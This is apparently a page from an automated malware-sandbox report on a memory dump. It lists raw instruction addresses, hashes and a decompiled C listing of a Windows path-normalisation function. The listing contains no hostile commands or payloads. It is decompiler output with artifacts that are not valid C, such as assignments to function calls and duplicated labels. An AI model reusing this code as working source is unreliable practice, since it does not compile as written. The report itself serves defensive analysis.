0x03915df1
0x03915df3
0x0391635a
0x0391635a
0x00000000
0x0391635a
0x03915dfe
0x03915e02
0x03915e05
0x03915e07
0x03915e10
0x03915e13
0x03915e1b
0x03915e1c
0x03915e21
0x03915e22
0x03915e23
0x03915e25
0x03915e2a
0x03915e2c
0x03915e2e
0x03915e36
0x03915e39
0x03915e42
0x03915e47
0x03915e4d
0x03915e54
0x03915e54
0x03915e54
0x03915e2e
0x03915e5c
0x03915e5f
0x03915e62
0x03915e64
0x03915e6b
0x03915e70
0x03915e7a
0x03915e7a
0x03915e7a
0x03915e6b
0x03915e7e
0x03915e7f
0x03915e7f
0x03915e81
0x03915e87
0x03915e8b
0x03915e8c
0x03915e8c
0x03915e8c
0x03915e9a
0x03915e9c
0x03915ea2
0x03915ea6
0x03915f50
0x03915f50
0x03915f57
0x03915f66
0x03915f66
0x03915f66
0x03915f68
0x03915f6a
0x039163d0
0x00000000
0x03915f70
0x03915f70
0x03915f91
0x03915f9c
0x03915f9e
0x03915fa4
0x03915fa6
0x0391638c
0x03916392
0x039163a1
0x039163a7
0x039163af
0x039163af
0x039163bd
0x039163d8
0x00000000
0x039163d8
0x03915fac
0x03915fb2
0x03915fb4
0x03915fbd
0x03915fc6
0x03915fce
0x03915fd4
0x03915fdc
0x03915fec
0x03915fed
0x03915fee
0x03915fef
0x03915ff9
0x03915ffa
0x03915ffb
0x03915ffc
0x03916000
0x03916004
0x03916012
0x03916012
0x03916018
0x03916019
0x0391601a
0x0391601b
0x0391601c
0x03916020
0x03916059
0x0391605c
0x03916061
0x03916061
0x03916022
0x03916022
0x03916022
0x03916025
0x0391602a
0x0391602b
0x03916031
0x03916037
0x03916038
0x0391603e
0x03916048
0x03916049
0x0391604a
0x0391604b
0x0391604c
0x0391604d
0x03916053
0x03916054
0x03916054
0x03916062
0x03916065
0x03916067
0x0391606a
0x03916070
0x03916075
0x03916076
0x03916081
0x03916087
0x03916095
0x03916099
0x0391609e
0x039160a4
0x039160ae
0x039160b0
0x039160b3
0x039160b6
0x039160b8
0x039160ba
0x039160ba
0x039160ba
0x039160ba
0x039160be
0x039160c0
0x039160c5
0x039160c5
0x039160c5
0x039160c6
0x039160cd
0x03916114
0x039160cf
0x039160cf
0x039160d4
0x039160d5
0x039160da
0x039160db
0x039160e1
0x039160e2
0x039160e8
0x039160f8
0x039160fd
0x039160fe
0x03916102
0x03916104
0x03916107
0x03916109
0x0391610b
0x0391610b
0x0391610b
0x0391610b
0x0391610f
0x0391610f
0x03916117
0x0391611a
0x0391611f
0x03916125
0x03916134
0x03916139
0x0391613f
0x03916146
0x03916148
0x0391614b
0x0391614d
0x0391614f
0x0391614f
0x0391614f
0x0391614f
0x03916153
0x03916159
0x03916159
0x0391615c
0x03916163
0x03916169
0x0391616c
0x03916172
0x03916181
0x03916186
0x03916187
0x0391618b
0x03916191
0x03916195
0x039161a3
0x039161bb
0x039161c0
0x039161c3
0x039161cc
0x039161d0
0x039161dc
0x039161de
0x039161e1
0x039161e4
0x039161e6
0x039161e8
0x039161e8
0x039161e8
0x039161e8
0x039161e6
0x039161ec
0x039161f3
0x03916203
0x03916209
0x0391620a
0x03916216
0x0391621d
0x03916227
0x03916241
0x03916246
0x0391624c
0x03916257
0x03916259
0x0391625c
0x0391625e
0x03916260
0x03916260
0x03916260
0x03916260
0x0391625e
0x03916264
0x03916267
0x03916269
0x03916315
0x03916315
0x0391631b
0x0391631e
0x03916324
0x03916327
0x0391632f
0x03916330
0x03916333
0x0391633a
0x0391633c
0x03916335
0x03916335
0x03916335
0x0391633f
0x03916342
0x0391634c
0x03916352
0x03916355
0x03916355
0x03916359
0x00000000
0x0391626f
0x03916275
0x03916275
0x03916278
0x0391627e
0x0391627e
0x03916281
0x03916287
0x0391628d
0x03916298
0x0391629c
0x039162a2
0x0391629e
0x0391629e
0x0391629e
0x039162a7
0x039162a7
0x039162aa
0x039162b0
0x039162f0
0x039162f0
0x039162f2
0x039162f8
0x039162fd
0x039162b2
0x039162b2
0x039162b2
0x039162b5
0x039162dd
0x039162e2
0x039162e5
0x039162b7
0x039162b8
0x039162bb
0x039162bd
0x039162c0
0x039162c4
0x039162cd
0x039162cd
0x039162c0
0x039162bb
0x039162b5
0x03916302
0x03916303
0x03916305
0x03916305
0x03916305
0x0391630c
0x0391630c
0x00000000
0x0391627e
0x03916269
0x03915eac
0x03915ebb
0x03915ebe
0x03915ecb
0x03915ecb
0x03915ece
0x03915ece
0x03915ed4
0x03915ed7
0x03915ed9
0x03915edb
0x03915edb
0x03915ee1
0x03915ee1
0x03915ee3
0x03915f20
0x03915f20
0x03915ee5
0x03915ee5
0x03915ee5
0x03915ee8
0x03915f11
0x03915f18
0x03915eea
0x03915eea
0x03915eed
0x03915ef2
0x03915ef8
0x03915efb
0x03915f0a
0x03915f0a
0x03915eed
0x03915ee8
0x03915f22
0x03915f28
0x00000000
0x00000000
0x03915f30
0x03915f31
0x03915f37
0x03915f3a
0x03915f3d
0x03915f44
0x00000000
0x00000000
0x00000000
0x03915f46
0x03915f48
0x03915f4d
0x00000000
0x03915f4d
0x03915dda
0x03915ddf
0x00000000
0x03915ddf
0x03915dd8
0x03915da7
0x03915da9
0x03915dac
0x03915dae
0x00000000
0x03915db4
0x03915db4
0x00000000
0x03915db4
0x03915dae
0x03915d88
0x03915d8d
0x03916363
0x03916369
0x0391636a
0x03916370
0x03916372
0x0391637a
0x0391637b
0x0391637d
0x00000000
0x00000000
0x0391637f
0x03916385
0x00000000
0x03916385
0x03915d38
0x03915d3b
0x00000000
0x00000000
0x00000000
0x03915d3b
0x03915d27
0x03915d29
0x00000000
0x00000000
0x00000000
0x03916360
0x00000000
0x03916360
0x03915c10
0x03915c10
0x039163da
0x039163e5
0x039163e5

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bdf0c0e8391001b4e2b191f592e963c1d749fa87c8c2350a9346e86179819ab
Instruction ID: fe69f3c63887812bb33f7a227093675f5f9ef130be67e98598e2b645c76f5a5d
Opcode Fuzzy Hash: 5bdf0c0e8391001b4e2b191f592e963c1d749fa87c8c2350a9346e86179819ab
Instruction Fuzzy Hash: C3423875D002298FDB24CF68C880BA9F7B5FF49304F1985AAD94DEB242D7349A95CF50

Uniqueness

Uniqueness Score: -1.00%

Function 03866E30, Relevance: .5, Instructions: 481
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E03866E30(signed short __ecx, signed short __edx, signed int _a4, intOrPtr* _a8, char* _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				char _v20;
				signed int _v32;
				signed short _v34;
				intOrPtr _v36;
				signed short _v38;
				signed short _v40;
				char _v41;
				signed int _v48;
				short _v50;
				signed int _v52;
				signed short _v54;
				signed int _v56;
				char _v57;
				signed int _v64;
				signed int _v68;
				signed short _v70;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed short _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				unsigned int _v128;
				char _v136;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* __ebp;
				signed int _t312;
				signed int _t313;
				char* _t315;
				unsigned int _t316;
				signed int _t317;
				short* _t319;
				void* _t320;
				signed int _t321;
				signed short _t327;
				signed int _t328;
				signed int _t335;
				signed short* _t336;
				signed int _t337;
				signed int _t338;
				signed int _t349;
				signed short _t352;
				signed int _t357;
				signed int _t360;
				signed int _t363;
				void* _t365;
				signed int _t366;
				signed short* _t367;
				signed int _t369;
				signed int _t375;
				signed int _t379;
				signed int _t384;
				signed int _t386;
				void* _t387;
				signed short _t389;
				intOrPtr* _t392;
				signed int _t397;
				unsigned int _t399;
				signed int _t401;
				signed int _t402;
				signed int _t407;
				void* _t415;
				signed short _t417;
				unsigned int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t422;
				intOrPtr* _t433;
				signed int _t435;
				void* _t436;
				signed int _t437;
				signed int _t438;
				signed int _t440;
				signed short _t443;
				void* _t444;
				signed int _t445;
				signed int _t446;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;

				_t425 = __edx;
				_push(0xfffffffe);
				_push(0x391fca8);
				_push(0x38917f0);
				_push( *[fs:0x0]);
				_t312 =  *0x393d360;
				_v12 = _v12 ^ _t312;
				_t313 = _t312 ^ _t453;
				_v32 = _t313;
				_push(_t313);
				 *[fs:0x0] =  &_v20;
				_v116 = __edx;
				_t443 = __ecx;
				_v88 = __ecx;
				_t386 = _a4;
				_t433 = _a8;
				_v112 = _t433;
				_t315 = _a12;
				_v64 = _t315;
				_t392 = _a16;
				_v108 = _t392;
				if(_t433 != 0) {
					 *_t433 = 0;
				}
				if(_t315 != 0) {
					 *_t315 = 0;
				}
				if(_t425 > 0xffff) {
					_v116 = 0xffff;
				}
				 *_t392 = 0;
				 *((intOrPtr*)(_t392 + 4)) = 0;
				_t316 =  *_t443 & 0x0000ffff;
				_v104 = _t316;
				_t435 = _t316 >> 1;
				_v120 = _t435;
				if(_t435 == 0) {
					L124:
					_t317 = 0;
					goto L60;
				} else {
					_t319 =  *((intOrPtr*)(_t443 + 4));
					if( *_t319 != 0) {
						_t397 = _t435;
						_t320 = _t319 + _t435 * 2;
						_t425 = _t320 - 2;
						while(_t397 != 0) {
							if( *_t425 == 0x20) {
								_t397 = _t397 - 1;
								_t425 = _t425 - 2;
								continue;
							}
							if(_t397 == 0) {
								goto L124;
							}
							_t321 =  *(_t320 - 2) & 0x0000ffff;
							if(_t321 == 0x5c || _t321 == 0x2f) {
								_v57 = 0;
							} else {
								_v57 = 1;
							}
							_t399 = _v116 >> 1;
							_v92 = _t399;
							_v128 = _t399;
							E0388FA60(_t386, 0, _v116);
							_v56 = 0;
							_v52 = 0;
							_v50 = _v92 + _v92;
							_v48 = _t386;
							_t327 = E038674C0(_t443);
							if(_t327 != 0) {
								_t389 = _t327 >> 0x10;
								_t328 = _t327 & 0x0000ffff;
								_v112 = _t328;
								_t437 = _v64;
								if(_t437 == 0) {
									L122:
									_t438 = _t328 + 8;
									_t401 = _v92;
									if(_t438 >= (_t401 + _t401 & 0x0000ffff)) {
										_t209 = _t438 + 2; // 0xddeeddf0
										_t402 = _t209;
										asm("sbb eax, eax");
										_t317 =  !0xffff & _t402;
									} else {
										E03879BC6( &_v52, 0x3821080);
										_t425 =  *((intOrPtr*)(_t443 + 4)) + (_t389 >> 1) * 2;
										E03889377( &_v52,  *((intOrPtr*)(_t443 + 4)) + (_t389 >> 1) * 2, _v112);
										_t317 = _t438;
									}
									goto L60;
								}
								if(_t389 != 0) {
									_t425 = _t389;
									_t335 = E038C46A7(_t443, _t389, _t437);
									if(_t335 < 0) {
										goto L124;
									}
									if( *_t437 != 0) {
										goto L124;
									}
									_t328 = _v112;
								}
								goto L122;
							} else {
								_t425 = _t443;
								_t336 =  *(_t425 + 4);
								_t407 =  *_t425 & 0x0000ffff;
								if(_t407 < 2) {
									L17:
									if(_t407 < 4 ||  *_t336 == 0 || _t336[1] != 0x3a) {
										_t337 = 5;
									} else {
										if(_t407 < 6) {
											L98:
											_t337 = 3;
											L23:
											 *_v108 = _t337;
											_t409 = 0;
											_v72 = 0;
											_v68 = 0;
											_v64 = 0;
											_v84 = 0;
											_v41 = 0;
											_t445 = 0;
											_v76 = 0;
											_v8 = 0;
											if(_t337 != 2) {
												_t338 = _t337 - 1;
												if(_t338 > 6) {
													L164:
													_t446 = 0;
													_v64 = 0;
													_t439 = _v92;
													goto L59;
												}
												switch( *((intOrPtr*)(_t338 * 4 +  &M0386749C))) {
													case 0:
														__ecx = 0;
														__eflags = 0;
														_v124 = 0;
														__esi = 2;
														while(1) {
															_v100 = __esi;
															__eflags = __esi - __edi;
															if(__esi >= __edi) {
																break;
															}
															__eax =  *(__edx + 4);
															__eax =  *( *(__edx + 4) + __esi * 2) & 0x0000ffff;
															__eflags = __eax - 0x5c;
															if(__eax == 0x5c) {
																L140:
																__ecx = __ecx + 1;
																_v124 = __ecx;
																__eflags = __ecx - 2;
																if(__ecx == 2) {
																	break;
																}
																L141:
																__esi = __esi + 1;
																continue;
															}
															__eflags = __eax - 0x2f;
															if(__eax != 0x2f) {
																goto L141;
															}
															goto L140;
														}
														__eax = __esi;
														_v80 = __esi;
														__eax =  *(__edx + 4);
														_v68 =  *(__edx + 4);
														__eax = __esi + __esi;
														_v72 = __ax;
														__eax =  *(__edx + 2) & 0x0000ffff;
														_v70 = __ax;
														_v76 = __esi;
														goto L80;
													case 1:
														goto L164;
													case 2:
														__eax = E038452A5(__ecx);
														_v84 = __eax;
														_v41 = 1;
														__eflags = __eax;
														if(__eax == 0) {
															__eax =  *[fs:0x30];
															__ebx =  *(__eax + 0x10);
															__ebx =  *(__eax + 0x10) + 0x24;
														} else {
															__ebx = __eax + 0xc;
														}
														 *(__ebx + 4) =  *( *(__ebx + 4)) & 0x0000ffff;
														__eax = L03852600( *( *(__ebx + 4)) & 0x0000ffff);
														__si = __ax;
														_v88 =  *(_v88 + 4);
														__ecx =  *( *(_v88 + 4)) & 0x0000ffff;
														__eax = L03852600( *( *(_v88 + 4)) & 0x0000ffff);
														_v54 = __ax;
														__eflags = __ax - __ax;
														if(__eflags != 0) {
															__cx = __ax;
															L038C4735(__ecx, __edx, __eflags) = 0x3d;
															_v40 = __ax;
															__si = _v54;
															_v38 = __si;
															_v36 = 0x3a;
															 &_v40 =  &_v136;
															E0388BB40(__ecx,  &_v136,  &_v40) =  &_v52;
															__eax =  &_v136;
															__eax = E03872010(__ecx, 0,  &_v136,  &_v52);
															__eflags = __eax;
															if(__eax >= 0) {
																__ax = _v52;
																_v56 = __eax;
																__edx = __ax & 0x0000ffff;
																__ecx = __edx;
																__ecx = __edx >> 1;
																_v100 = __ecx;
																__eflags = __ecx - 3;
																if(__ecx <= 3) {
																	L155:
																	__ebx = _v48;
																	L156:
																	_v72 = __ax;
																	goto L119;
																}
																__eflags = __ecx - _v92;
																if(__ecx >= _v92) {
																	goto L155;
																}
																__esi = 0x5c;
																__ebx = _v48;
																 *(__ebx + __ecx * 2) = __si;
																__eax = __edx + 2;
																_v56 = __edx + 2;
																_v52 = __ax;
																goto L156;
															}
															__eflags = __eax - 0xc0000023;
															if(__eax != 0xc0000023) {
																__eax = 0;
																_v52 = __ax;
																_v40 = __si;
																_v38 = 0x5c003a;
																_v34 = __ax;
																__edx =  &_v40;
																__ecx =  &_v52;
																L038C4658(__ecx,  &_v40) = 8;
																_v72 = __ax;
																__ebx = _v48;
																__ax = _v52;
																_v56 = 8;
																goto L119;
															}
															__ax = _v52;
															_v56 = __eax;
															__eax = __ax & 0x0000ffff;
															__eax = (__ax & 0x0000ffff) + 2;
															_v64 = __eax;
															__eflags = __eax - 0xffff;
															if(__eax <= 0xffff) {
																_v72 = __ax;
																__ebx = _v48;
																goto L119;
															}
															__esi = 0;
															_v64 = 0;
															__ebx = _v48;
															__edi = _v92;
															goto L58;
														} else {
															__eax =  *__ebx;
															_v72 =  *__ebx;
															__eax =  *(__ebx + 4);
															_v68 =  *(__ebx + 4);
															__edx =  &_v72;
															__ecx =  &_v52;
															__eax = E03879BC6(__ecx,  &_v72);
															__ebx = _v48;
															__eax = _v52 & 0x0000ffff;
															_v56 = _v52 & 0x0000ffff;
															L119:
															__eax = 3;
															_v80 = 3;
															__esi = 2;
															_v76 = 2;
															__edx = _v88;
															goto L25;
														}
													case 3:
														__eax = E038452A5(__ecx);
														_v84 = __eax;
														_v41 = 1;
														__eflags = __eax;
														if(__eax == 0) {
															__eax =  *[fs:0x30];
															__ebx =  *(__eax + 0x10);
															__ebx =  *(__eax + 0x10) + 0x24;
															__eflags = __ebx;
															__esi = _v76;
														} else {
															__ebx = __eax + 0xc;
														}
														__ecx = __ebx;
														__eax = L038483AE(__ebx);
														_v80 = __eax;
														__ecx =  *__ebx;
														_v72 =  *__ebx;
														__ecx =  *(__ebx + 4);
														_v68 = __ecx;
														__eflags = __eax - 3;
														if(__eax == 3) {
															__eax = 4;
															_v72 = __ax;
														} else {
															__ecx = __eax + __eax;
															_v72 = __cx;
														}
														goto L80;
													case 4:
														_t340 = E038452A5(0);
														_v84 = _t340;
														_v41 = 1;
														__eflags = _t340;
														if(_t340 == 0) {
															_t428 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
															_t445 = _v76;
														} else {
															_t428 = _t340 + 0xc;
															 *((intOrPtr*)(_v108 + 4)) =  *((intOrPtr*)(_t340 + 0x14));
														}
														_v72 =  *_t428;
														_v68 = _t428[2];
														_v80 = L038483AE(_t428);
														L80:
														E03879BC6( &_v52,  &_v72);
														_t386 = _v48;
														_v56 = _v52 & 0x0000ffff;
														_t425 = _v88;
														goto L25;
													case 5:
														__eax = 4;
														_v80 = 4;
														__esi = 4;
														_v76 = 4;
														__eflags = __edi - 4;
														if(__edi < 4) {
															__esi = __edi;
															_v76 = __esi;
														}
														__eax =  *0x3821080;
														_v72 =  *0x3821080;
														__eax =  *0x3821084;
														_v68 =  *0x3821084;
														__edx =  &_v72;
														__ecx =  &_v52;
														__eax = E03879BC6(__ecx,  &_v72);
														__eax = _v52 & 0x0000ffff;
														_v56 = __eax;
														__edx = _v88;
														__ebx = _v48;
														__eflags = __eax - 6;
														if(__eax >= 6) {
															__eax =  *(__edx + 4);
															__ax =  *((intOrPtr*)(__eax + 4));
															 *(__ebx + 4) =  *((intOrPtr*)(__eax + 4));
														}
														__eax = _v108;
														__eflags =  *_v108 - 7;
														if( *_v108 == 7) {
															_v57 = 0;
														}
														goto L25;
												}
											} else {
												_v80 = 3;
												L25:
												_t349 = _v104 + (_v72 & 0x0000ffff) - _t445 + _t445;
												_v104 = _t349;
												_t415 = _t349 + 2;
												if(_t415 > _v116) {
													if(_t435 <= 1) {
														if( *( *(_t425 + 4)) != 0x2e) {
															goto L72;
														}
														if(_t435 != 1) {
															asm("sbb esi, esi");
															_t446 =  !_t445 & _v104;
															_v64 = _t446;
															_t439 = _v92;
															L58:
															_t409 = _v84;
															L59:
															_v8 = 0xfffffffe;
															E0386746D(_t386, _t409, _t439, _t446);
															_t317 = _t446;
															L60:
															 *[fs:0x0] = _v20;
															_pop(_t436);
															_pop(_t444);
															_pop(_t387);
															return E0388B640(_t317, _t387, _v32 ^ _t453, _t425, _t436, _t444);
														}
														_t417 = _v72;
														if(_t417 != 8) {
															if(_v116 >= (_t417 & 0x0000ffff)) {
																_t352 = _v56;
																_t418 = _t352 & 0x0000ffff;
																_v104 = _t418;
																_t419 = _t418 >> 1;
																_v100 = _t419;
																if(_t419 != 0) {
																	if( *((short*)(_t386 + _t419 * 2 - 2)) == 0x5c) {
																		_t352 = _v104 + 0xfffffffe;
																		_v56 = _t352;
																		_v52 = _t352;
																	}
																}
																L27:
																_t420 = 0;
																_v100 = 0;
																L28:
																L28:
																if(_t420 < (_t352 & 0x0000ffff) >> 1) {
																	goto L69;
																} else {
																	_t422 = (_v56 & 0x0000ffff) >> 1;
																	_v96 = _t422;
																}
																while(_t445 < _t435) {
																	_t363 = ( *(_t425 + 4))[_t445] & 0x0000ffff;
																	if(_t363 == 0x5c) {
																		L44:
																		if(_t422 == 0) {
																			L46:
																			 *(_t386 + _t422 * 2) = 0x5c;
																			_t422 = _t422 + 1;
																			_v96 = _t422;
																			L43:
																			_t445 = _t445 + 1;
																			_v76 = _t445;
																			continue;
																		}
																		if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x5c) {
																			goto L43;
																		}
																		goto L46;
																	}
																	_t365 = _t363 - 0x2e;
																	if(_t365 == 0) {
																		_t126 = _t445 + 1; // 0x2
																		_t366 = _t126;
																		_v104 = _t366;
																		if(_t366 == _t435) {
																			goto L43;
																		}
																		_t367 =  *(_t425 + 4);
																		_t440 =  *(_t367 + 2 + _t445 * 2) & 0x0000ffff;
																		_v108 = _t440;
																		_t435 = _v120;
																		if(_t440 != 0x5c) {
																			if(_v108 == 0x2f) {
																				goto L83;
																			}
																			if(_v108 != 0x2e) {
																				L35:
																				while(_t445 < _t435) {
																					_t369 = ( *(_t425 + 4))[_t445] & 0x0000ffff;
																					if(_t369 == 0x5c || _t369 == 0x2f) {
																						if(_t445 < _t435) {
																							if(_t422 >= 2) {
																								if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x2e) {
																									if( *((short*)(_t386 + _t422 * 2 - 4)) != 0x2e) {
																										_t422 = _t422 - 1;
																										_v96 = _t422;
																									}
																								}
																							}
																						}
																						break;
																					} else {
																						 *(_t386 + _t422 * 2) = _t369;
																						_t422 = _t422 + 1;
																						_v96 = _t422;
																						_t445 = _t445 + 1;
																						_v76 = _t445;
																						continue;
																					}
																				}
																				_t445 = _t445 - 1;
																				_v76 = _t445;
																				goto L43;
																			}
																			_t155 = _t445 + 2; // 0x3
																			_t425 = _v88;
																			if(_t155 == _t435) {
																				while(1) {
																					L103:
																					if(_t422 < _v80) {
																						break;
																					}
																					 *(_t386 + _t422 * 2) = 0;
																					_t425 = _v88;
																					if( *(_t386 + _t422 * 2) != 0x5c) {
																						_t422 = _t422 - 1;
																						_v96 = _t422;
																						continue;
																					} else {
																						goto L105;
																					}
																					while(1) {
																						L105:
																						if(_t422 < _v80) {
																							goto L180;
																						}
																						 *(_t386 + _t422 * 2) = 0;
																						_t435 = _v120;
																						if( *(_t386 + _t422 * 2) == 0x5c) {
																							if(_t422 < _v80) {
																								goto L180;
																							}
																							L110:
																							_t445 = _t445 + 1;
																							_v76 = _t445;
																							goto L43;
																						}
																						_t422 = _t422 - 1;
																						_v96 = _t422;
																					}
																					break;
																				}
																				L180:
																				_t422 = _t422 + 1;
																				_v96 = _t422;
																				goto L110;
																			}
																			_t375 =  *(_t367 + 4 + _t445 * 2) & 0x0000ffff;
																			if(_t375 != 0x5c) {
																				if(_t375 != 0x2f) {
																					goto L35;
																				}
																			}
																			goto L103;
																		}
																		L83:
																		_t445 = _v104;
																		_v76 = _t445;
																		goto L43;
																	}
																	if(_t365 == 1) {
																		goto L44;
																	} else {
																		goto L35;
																	}
																}
																_t449 = _v80;
																if(_v57 != 0) {
																	if(_t422 > _t449) {
																		if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x5c) {
																			_t422 = _t422 - 1;
																			_v96 = _t422;
																		}
																	}
																}
																_t439 = _v92;
																if(_t422 >= _v92) {
																	L52:
																	if(_t422 == 0) {
																		L56:
																		_t425 = _t422 + _t422;
																		_v52 = _t425;
																		if(_v112 != 0) {
																			_t357 = _t422;
																			while(1) {
																				_v100 = _t357;
																				if(_t357 == 0) {
																					break;
																				}
																				if( *((short*)(_t386 + _t357 * 2 - 2)) == 0x5c) {
																					break;
																				}
																				_t357 = _t357 - 1;
																			}
																			if(_t357 >= _t422) {
																				L113:
																				 *_v112 = 0;
																				goto L57;
																			}
																			if(_t357 < _t449) {
																				goto L113;
																			}
																			 *_v112 = _t386 + _t357 * 2;
																		}
																		L57:
																		_t446 = _t425 & 0x0000ffff;
																		_v64 = _t446;
																		goto L58;
																	}
																	_t422 = _t422 - 1;
																	_v96 = _t422;
																	_t360 =  *(_t386 + _t422 * 2) & 0x0000ffff;
																	if(_t360 == 0x20) {
																		goto L51;
																	}
																	if(_t360 == 0x2e) {
																		goto L51;
																	}
																	_t422 = _t422 + 1;
																	_v96 = _t422;
																	goto L56;
																} else {
																	L51:
																	 *(_t386 + _t422 * 2) = 0;
																	goto L52;
																}
																L69:
																if( *((short*)(_t386 + _t420 * 2)) == 0x2f) {
																	 *((short*)(_t386 + _t420 * 2)) = 0x5c;
																}
																_t420 = _t420 + 1;
																_v100 = _t420;
																_t352 = _v56;
																goto L28;
															}
															_t446 = _t417 & 0x0000ffff;
															_v64 = _t446;
															_t439 = _v92;
															goto L58;
														}
														if(_v116 > 8) {
															goto L26;
														}
														_t446 = 0xa;
														_v64 = 0xa;
														_t439 = _v92;
														goto L58;
													}
													L72:
													if(_t415 > 0xffff) {
														_t446 = 0;
													}
													_v64 = _t446;
													_t439 = _v92;
													goto L58;
												}
												L26:
												_t352 = _v56;
												goto L27;
											}
										}
										_t379 = _t336[2] & 0x0000ffff;
										if(_t379 != 0x5c) {
											if(_t379 == 0x2f) {
												goto L22;
											}
											goto L98;
										}
										L22:
										_t337 = 2;
									}
									goto L23;
								}
								_t450 =  *_t336 & 0x0000ffff;
								if(_t450 == 0x5c || _t450 == 0x2f) {
									if(_t407 < 4) {
										L132:
										_t337 = 4;
										goto L23;
									}
									_t451 = _t336[1] & 0x0000ffff;
									if(_t451 != 0x5c) {
										if(_t451 == 0x2f) {
											goto L87;
										}
										goto L132;
									}
									L87:
									if(_t407 < 6) {
										L135:
										_t337 = 1;
										goto L23;
									}
									_t452 = _t336[2] & 0x0000ffff;
									if(_t452 != 0x2e) {
										if(_t452 == 0x3f) {
											goto L89;
										}
										goto L135;
									}
									L89:
									if(_t407 < 8) {
										L134:
										_t337 = ((0 | _t407 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
										goto L23;
									}
									_t384 = _t336[3] & 0x0000ffff;
									if(_t384 != 0x5c) {
										if(_t384 == 0x2f) {
											goto L91;
										}
										goto L134;
									}
									L91:
									_t337 = 6;
									goto L23;
								} else {
									goto L17;
								}
							}
						}
					}
					goto L124;
				}
			}

0x03866e30
0x03866e35
0x03866e37
0x03866e3c
0x03866e47
0x03866e4b
0x03866e50
0x03866e53
0x03866e55
0x03866e5b
0x03866e5f
0x03866e65
0x03866e68
0x03866e6a
0x03866e6d
0x03866e70
0x03866e73
0x03866e76
0x03866e79
0x03866e7c
0x03866e7f
0x03866e84
0x0386710f
0x0386710f
0x03866e8c
0x03866e8e
0x03866e8e
0x03866e97
0x038af5d3
0x038af5d3
0x03866e9d
0x03866ea3
0x03866eaa
0x03866ead
0x03866eb2
0x03866eb4
0x03866eb7
0x03867466
0x03867466
0x00000000
0x03866ebd
0x03866ebd
0x03866ec4
0x03866eca
0x03866ecc
0x03866ecf
0x03866ed2
0x03866ede
0x038af5df
0x038af5e0
0x00000000
0x038af5e0
0x03866ee6
0x00000000
0x00000000
0x03866eec
0x03866ef3
0x03867181
0x03866f02
0x03866f02
0x03866f02
0x03866f0b
0x03866f0d
0x03866f10
0x03866f17
0x03866f21
0x03866f24
0x03866f2d
0x03866f31
0x03866f36
0x03866f3d
0x03867413
0x03867416
0x03867419
0x0386741c
0x03867421
0x0386742b
0x0386742b
0x0386742e
0x03867439
0x038af60b
0x038af60b
0x038af615
0x038af619
0x0386743f
0x03867447
0x03867454
0x0386745a
0x0386745f
0x0386745f
0x00000000
0x03867439
0x03867425
0x038af5e9
0x038af5ed
0x038af5f4
0x00000000
0x00000000
0x038af5fd
0x00000000
0x00000000
0x038af603
0x038af603
0x00000000
0x03866f43
0x03866f43
0x03866f45
0x03866f48
0x03866f4e
0x03866f65
0x03866f68
0x0386721f
0x03866f83
0x03866f86
0x038672dc
0x038672dc
0x03866f9e
0x03866fa1
0x03866fa3
0x03866fa5
0x03866fa8
0x03866fab
0x03866fae
0x03866fb1
0x03866fb4
0x03866fb6
0x03866fb9
0x03866fbf
0x0386718a
0x0386718e
0x038af831
0x038af831
0x038af833
0x038af836
0x00000000
0x038af836
0x03867194
0x00000000
0x038af658
0x038af658
0x038af65a
0x038af65d
0x038af662
0x038af662
0x038af665
0x038af667
0x00000000
0x00000000
0x038af669
0x038af66c
0x038af670
0x038af673
0x038af67a
0x038af67a
0x038af67b
0x038af67e
0x038af681
0x00000000
0x00000000
0x038af683
0x038af683
0x00000000
0x038af683
0x038af675
0x038af678
0x00000000
0x00000000
0x00000000
0x038af678
0x038af686
0x038af688
0x038af68b
0x038af68e
0x038af691
0x038af694
0x038af698
0x038af69c
0x038af6a0
0x00000000
0x00000000
0x00000000
0x00000000
0x03867397
0x0386739c
0x0386739f
0x038673a3
0x038673a5
0x038af6bb
0x038af6c1
0x038af6c4
0x038673ab
0x038673ab
0x038673ab
0x038673b1
0x038673b5
0x038673ba
0x038673c0
0x038673c3
0x038673c7
0x038673cc
0x038673d0
0x038673d3
0x038af6cc
0x038af6d4
0x038af6d9
0x038af6dd
0x038af6e1
0x038af6e5
0x038af6f0
0x038af6fc
0x038af700
0x038af709
0x038af70e
0x038af710
0x038af784
0x038af788
0x038af78b
0x038af78e
0x038af790
0x038af792
0x038af795
0x038af798
0x038af7b7
0x038af7b7
0x038af7ba
0x038af7ba
0x00000000
0x038af7ba
0x038af79a
0x038af79d
0x00000000
0x00000000
0x038af79f
0x038af7a4
0x038af7a7
0x038af7ab
0x038af7ae
0x038af7b1
0x00000000
0x038af7b1
0x038af712
0x038af717
0x038af74c
0x038af74e
0x038af752
0x038af756
0x038af75d
0x038af761
0x038af764
0x038af76c
0x038af771
0x038af775
0x038af778
0x038af77c
0x00000000
0x038af77c
0x038af719
0x038af71d
0x038af720
0x038af723
0x038af726
0x038af729
0x038af72e
0x038af740
0x038af744
0x00000000
0x038af744
0x038af730
0x038af732
0x038af735
0x038af738
0x00000000
0x038673d9
0x038673d9
0x038673db
0x038673de
0x038673e1
0x038673e4
0x038673e7
0x038673ea
0x038673ef
0x038673f2
0x038673f6
0x038673f9
0x038673f9
0x038673fe
0x03867401
0x03867406
0x03867409
0x00000000
0x03867409
0x00000000
0x038af7c5
0x038af7ca
0x038af7cd
0x038af7d1
0x038af7d3
0x038af7da
0x038af7e0
0x038af7e3
0x038af7e3
0x038af7e6
0x038af7d5
0x038af7d5
0x038af7d5
